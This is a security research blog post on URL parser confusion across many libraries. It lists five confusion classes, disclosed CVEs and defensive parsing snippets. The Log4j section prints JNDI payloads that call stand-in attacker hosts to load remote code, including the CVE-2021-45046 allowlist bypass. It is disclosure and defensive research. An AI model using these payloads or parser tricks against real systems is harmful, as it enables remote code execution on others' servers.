Exploiting URL Parsing Confusion

Noam Moshe

/ January 10th, 2022

URL Vulnerabilities: Exploiting URL Parser Confusion

Executive Summary

Team82 and the Snyk research team collaborated on a research paper, available today, that examines URL parsing confusion.
Different libraries parse URLs in their own way, and attackers can abuse these inconsistencies.
We examined 16 URL parsing libraries including: urllib (Python), urllib3 (Python), rfc3986 (Python), httptools (Python), curl lib (cURL), Wget, Chrome (Browser), Uri (.NET), URL (Java), URI (Java), parse_url (PHP), url (NodeJS), url-parse (NodeJS), net/url (Go), uri (Ruby) and URI (Perl).
Our paper describes five classes of inconsistencies between parsing libraries that can be exploited to cause denial-of-service conditions, information leaks, and, under some circumstances, remote code execution.
The five types of inconsistencies are: scheme confusion, slash confusion, backslash confusion, URL-encoded data confusion, and scheme mixup.
The Team82-Snyk research collaboration also uncovered eight vulnerabilities in web applications and third-party libraries (many written in different programming languages) that web developers use in their applications.
Among the eight vulnerabilities was a bug in libcurl. The issue was disclosed to cURL creator Daniel Stenberg, who patched it in the latest cURL version.

URLs are in many ways the hub of our digital lives, our link to critical services, news, entertainment, and much more. Therefore, any security vulnerabilities with how browsers, applications, and servers receive URL requests, parse them, and fetch requested resources could pose significant issues for users and harm trust in the internet.

Claroty's Team82, in collaboration with Snyk's research team, has conducted an extensive research project examining URL parsing primitives, and discovered major differences in the way many different parsing libraries and tools handle URLs. Today, we are publishing a research paper (free PDF download here) that describes our analysis, showcases the differences between parsers, and shows how URL parsing confusion may be abused. We also uncovered eight vulnerabilities that have been privately disclosed and patched.

Understanding URL Syntax

To understand how differences in URL parsing primitives could be abused, we first need a basic understanding of how URLs are built. A URL is built from five components: scheme, authority, path, query, and fragment. Each component fulfills a different role, be it dictating the protocol for the request, the host that holds the resource, which exact resource should be fetched, and more. In its general form, a URL looks like this:

scheme://authority/path?query#fragment
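To make the five components concrete, here is a minimal sketch that splits a URL with Python's standard urllib.parse module. The URL itself is a made-up example (example.com is a reserved documentation domain), and other parsers may split the same string differently, which is the point of this research.

```python
from urllib.parse import urlsplit

# Hypothetical example URL, chosen only to exercise all five components.
url = "https://example.com:8443/docs/index.html?lang=en#install"
parts = urlsplit(url)

# Map the names used in this article to what urlsplit() returns.
components = {
    "scheme": parts.scheme,        # protocol used for the request
    "authority": parts.netloc,     # host (and optional port) holding the resource
    "path": parts.path,            # which resource to fetch
    "query": parts.query,          # parameters passed to the resource
    "fragment": parts.fragment,    # client-side anchor within the resource
}

for name, value in components.items():
    print(f"{name:<10} {value}")
```

Note that urlsplit() calls the authority "netloc" and exposes the host and port separately as parts.hostname and parts.port.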

Over the years, many RFCs have defined URLs, each making changes in an attempt to improve the URL standard. However, the frequency of changes created major differences among URL parsers, each of which complies with a different RFC (in order to remain backward compatible). Some, in fact, choose to ignore new RFCs altogether, instead adopting a URL specification they deem more reflective of how real-life URLs should be parsed. This created an environment in which one URL parser could interpret a URL differently than another, which could lead to serious security concerns.

RFC History timeline — The history of URL-defining RFCs, starting with RFC 1738 which was written in 1994, and ending with the most up-to-date RFC, RFC 3986 which was written in 2005.

Recent Example: Log4j allowedLdapHost Bypass

To fully understand how dangerous confusion among URL parsing primitives can be, let's look at a real-life vulnerability that abused those differences. In December 2021, the world was taken by storm by a remote code execution vulnerability in Log4j, a popular Java logging library. Because of Log4j's popularity, millions of servers and applications were affected, forcing administrators to determine where Log4j may be in their environments and their exposure to proof-of-concept attacks in the wild.

We will not fully explain this vulnerability here, since it was widely covered. In short, an attacker-controlled string is evaluated whenever it is logged by an application, resulting in a JNDI (Java Naming and Directory Interface) lookup that connects to an attacker-specified server and loads malicious Java code.

A payload triggering this vulnerability could look like this:

${jndi:ldap://attacker.com:1389/a}

This payload would result in a remote class being loaded to the current Java context if this string were logged by a vulnerable application.

Team82 preauth RCE against VMware vCenter ESXi Server, exploiting the log4j vulnerability

Because of the popularity of this library, and the vast number of servers which this vulnerability affected, many patches and countermeasures were introduced in order to remedy this vulnerability. We will talk about one countermeasure in particular, which aimed to block any attempts to load classes from a remote source using JNDI.

This particular remedy was made inside the lookup process of the JNDI interface. Instead of allowing JNDI lookups from arbitrary remote sources, which could result in remote code execution, JNDI would allow only lookups from a set of predefined whitelisted hosts, allowedLdapHost, which by default contained only localhost. This would mean that even if an attacker-given input is evaluated and a JNDI lookup is made, the lookup process would fail if the given host is not in the whitelisted set. Therefore, an attacker-hosted class would not be loaded and the vulnerability rendered moot.

However, soon after this fix, a bypass to this mitigation was found (CVE-2021-45046), which once again allowed remote JNDI lookup and allowed the vulnerability to be exploited in order to achieve RCE. Let's analyze the bypass, which is as follows:

${jndi:ldap://127.0.0.1#.evilhost.com:1389/a}

As we can see, this payload once again contains a URL; however, the Authority component (host) of the URL seems irregular, containing two different hosts: 127.0.0.1 and evilhost.com. As it turns out, this is exactly where the bypass lies. The bypass stems from the fact that two different (!) URL parsers were used inside the JNDI lookup process, one for validating the URL and another for fetching it. Depending on how each parser treats the Fragment portion (#) of the URL, the Authority changes too.

To validate that the URL's host is allowed, Java's URI class was used, which parsed the URL, extracted the host, and checked whether the host is on the whitelist of allowed hosts. Indeed, if we parse this URL using Java's URI, we find that the URL's host is 127.0.0.1, which is included in the whitelist. However, on certain operating systems (mainly macOS) and specific configurations, when the JNDI lookup process fetches this URL, it does not try to fetch it from 127.0.0.1; instead, it makes a request to 127.0.0.1#.evilhost.com. This means that while this malicious payload will bypass the allowedLdapHost localhost validation (which is done by the URI parser), it will still try to fetch a class from a remote location.
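The same validate-with-one-parser, fetch-with-another pattern can be sketched in a few lines of Python. This is an illustration only, not the Log4j or JNDI code: urllib.parse stands in for the validating parser, naive_fetcher_host is a hypothetical lenient parser that ignores the fragment delimiter, and ALLOWED_HOSTS is an assumed allowlist.

```python
from urllib.parse import urlsplit

# Assumed allowlist for this sketch, mirroring the localhost-only default.
ALLOWED_HOSTS = {"127.0.0.1", "localhost"}

def validator_host(url: str) -> str:
    """Host as seen by an RFC 3986-style parser: '#' terminates the authority."""
    return urlsplit(url).hostname or ""

def naive_fetcher_host(url: str) -> str:
    """Hypothetical lenient fetcher: the authority runs up to the next '/',
    so a '#' inside it is treated as part of the host name."""
    authority = url.split("://", 1)[1].split("/", 1)[0]
    return authority.rsplit(":", 1)[0]  # drop a trailing ':port' if present

url = "ldap://127.0.0.1#.evilhost.com:1389/a"

checked = validator_host(url)       # what the allowlist check sees
fetched = naive_fetcher_host(url)   # what the lenient fetcher would resolve

print("validator sees:", checked, "allowed:", checked in ALLOWED_HOSTS)
print("fetcher sees:  ", fetched, "allowed:", fetched in ALLOWED_HOSTS)
```

The validator approves 127.0.0.1 while the fetcher acts on a different host string. One way to avoid this class of bug is to parse the URL once and pass the parsed host to the code that makes the request, rather than re-parsing the raw string.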

This bypass showcases how minor discrepancies between URL parsers could create huge security concerns and real-life vulnerabilities.

Team82-Snyk Joint Research Outcomes

During our analysis, we've looked into the following libraries and tools written in numerous languages: urllib (Python), urllib3 (Python), rfc3986 (Python), httptools (Python), curl lib (cURL), Wget, Chrome (Browser), Uri (.NET), URL (Java), URI (Java), parse_url (PHP), url (NodeJS), url-parse (NodeJS), net/url (Go), uri (Ruby) and URI (Perl).

As a result of our analysis, we were able to identify and categorize five different scenarios in which most URL parsers behaved unexpectedly:

Scheme Confusion: A confusion involving URLs with a missing or malformed scheme
Slash Confusion: A confusion involving URLs containing an irregular number of slashes
Backslash Confusion: A confusion involving URLs containing backslashes (\)
URL-Encoded Data Confusion: A confusion involving URLs containing URL-encoded data
Scheme Mixup: A confusion involving parsing a URL belonging to a certain scheme without a scheme-specific parser
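Four of these categories can be observed with a single parser. The sketch below shows how Python's urllib.parse handles one hand-picked input per category; the URLs are hypothetical examples rather than test cases from the paper, and scheme mixup is omitted because it depends on scheme-specific rules. Other parsers may return different results for the same strings. For instance, the WHATWG URL Standard followed by browsers treats a backslash like a forward slash for schemes such as http.

```python
from urllib.parse import urlsplit, unquote

# Scheme confusion: with no scheme, the host lands in the path.
no_scheme = urlsplit("example.com/path")

# Slash confusion: an extra slash leaves the authority empty.
extra_slash = urlsplit("http:///example.com/path")

# Backslash confusion: urllib keeps '\' inside the authority, so the text
# after '@' is reported as the host.
backslash = urlsplit("http://example.com\\@evil.example/")

# URL-encoded data confusion: urlsplit does not decode percent-escapes,
# so a later decoding step sees a different path.
encoded = urlsplit("http://example.com/%2e%2e/admin")

results = {
    "scheme": (no_scheme.netloc, no_scheme.path),
    "slash": (extra_slash.netloc, extra_slash.path),
    "backslash": backslash.hostname,
    "encoded": (encoded.path, unquote(encoded.path)),
}

for category, observed in results.items():
    print(f"{category:<10} {observed!r}")
```

Each result is reasonable on its own. The risk appears when a second component in the same request path reads the identical string with different rules.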

Using those five categories as a guideline, we've created the following table which showcases the differences between different URL parsers:

Abusing those inconsistencies can give rise to many possible vulnerabilities, ranging from a server-side request forgery (SSRF) vulnerability, which could result in remote code execution, all the way to an open-redirect vulnerability, which could result in a sophisticated phishing attack.
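As an illustration of the open-redirect case, here is a minimal sketch of a conservative check for a post-login redirect target. The function name is_safe_local_redirect is hypothetical, and this is not the patch applied by any of the libraries discussed in this post. It assumes the application only ever needs to redirect to paths on its own site, and it rejects inputs that a browser might interpret differently than the server-side parser does.

```python
from urllib.parse import urlsplit

def is_safe_local_redirect(target: str) -> bool:
    """Hypothetical check: accept only plain absolute paths on the same site."""
    # Reject backslashes and control characters, which some parsers
    # normalize or strip before interpreting the URL.
    if "\\" in target or any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in target):
        return False
    # Require exactly one leading slash: '//host' is a network-path
    # reference that points at another host.
    if not target.startswith("/") or target.startswith("//"):
        return False
    # Finally, confirm the parser sees neither a scheme nor an authority.
    parts = urlsplit(target)
    return parts.scheme == "" and parts.netloc == ""

candidates = [
    "/account/settings?tab=1",
    "//evil.example/login",
    "/\\evil.example",
    "https://evil.example/",
    "http:///evil.example",
]
for candidate in candidates:
    print(f"{candidate!r:<30} {is_safe_local_redirect(candidate)}")
```

The design choice is to accept a narrow, well-understood set of inputs instead of trying to list every malformed URL that a browser might repair into an absolute one.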

As a result of our research, we were able to identify the following vulnerabilities, which affect different frameworks and even different programming languages. The vulnerabilities below have been patched except for those found in unsupported versions of Flask:

Flask-security (Python, CVE-2021-23385)
Flask-security-too (Python, CVE-2021-32618)
Flask-User (Python, CVE-2021-23401)
Flask-unchained (Python, CVE-2021-23393)
Belledonne's SIP Stack (CVE-2021-33056)
Video.js (JavaScript, CVE-2021-23414)
Nagios XI (PHP, CVE-2021-37352)
Clearance (Ruby, CVE-2021-23435)

We invite you to download our paper to learn more about exploiting these parsing confusion scenarios, and a number of recommendations that blunt the impact of these vulnerabilities if they're exploited.

Our research was partially based on previous work, including a presentation by Orange Tsai "A New Era of SSRF" and a comparison of WHATWG vs. RFC 3986 by cURL creator, Daniel Stenberg. We would like to thank them for their innovative research.
